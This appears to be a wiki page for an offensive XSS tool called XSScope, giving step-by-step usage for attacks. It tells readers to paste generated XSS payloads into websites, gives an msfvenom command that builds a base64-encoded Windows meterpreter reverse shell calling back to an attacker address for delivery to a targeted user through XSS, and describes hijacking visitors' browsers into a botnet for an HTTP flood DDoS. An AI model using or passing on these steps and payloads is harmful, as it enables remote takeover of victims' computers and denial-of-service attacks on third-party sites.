-
-
Notifications
You must be signed in to change notification settings - Fork 78
Possible attacks
- Run xsscope.py by executing:
python3 xsscope.py
- Go to "XSS Build"
- Copy the payloads and use them in websites and hopefully get a XSS.
- (Optional) If you want to save all payloads as an intruder file, click Main -> Save as intruder
- Run xsscope.py by executing:
python3 xsscope.py
- Go to "Add HTML code"
- Choose a pregenerated HTML codes from software, or add your own HTML code.
- Click "Apply Code" when you finish.
- Go to XSS Payloads (inside "Add HTML code" window)
- Try 1 of our 10 payloads, or make your own, and paste it on the website.
- Run xsscope.py by executing:
python3 xsscope.py
- Go to Reverse Shell
- On the new tab, enter your command and press Execute
alert(1)
prompt('js code execution by xsscope')
open('https://website.com')
document.querySelector('.title').textContent = 'Injected by XSScope'
//This changes the title of the website
document.getElementsByTagName("img")[0].src = "https://website.com/image.png";
//This changes an image in the website
- and so on... you can use any javascript code you want to be executed
Note: When entering your command/payload, make sure they are base64-encoded.
Purpose: Getting an reverse shell by using Msfvenom payloads from a targeted user via XSS
Steps:
- Open a new terminal and generate a base64-encoded Reverse_tcp with Msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.128.73 LPORT=4444 -f raw | base64
- The output (please refer to the photo) is our command which we will enter on XSScope
- Now open XSScope by executing on your terminal
python3 xsscope.py
- Go to Agent Module
- Check on Execute .NET Shellcode commands
- Click Build Payload
- Click on Main and paste the payload we got on the first step
- Paste the payload into a Vulnerable Site and XSS payload is going to be triggered
Note: This is just a demo of the feature usage. You can use another C2 Framework and you can use different type of payload, as long as they are base64-encoded.
- Open XSScope and go to HTTP Flood (DDoS)
- Enter the URL you want to target
Note: When entering the URL, please look at the following rules:
website.com/index.php
website.com/index.php?id=1
(recommended)
website.com/index.php?id=1&page=home
(recommended)
website.com/index.php?id=1&page=
(recommended)
website.com
http://website.com
https://website.com
- Check Use HTTPS if the website is using SSL/TSL certificate, otherwise don't check it.
- Choose how many threads you want the botnet to use (0-100).
Note: The more threads you put, the more CPU power the victim uses and the higher the chances for the browser to freeze is. - Once setup is done, click Launch attack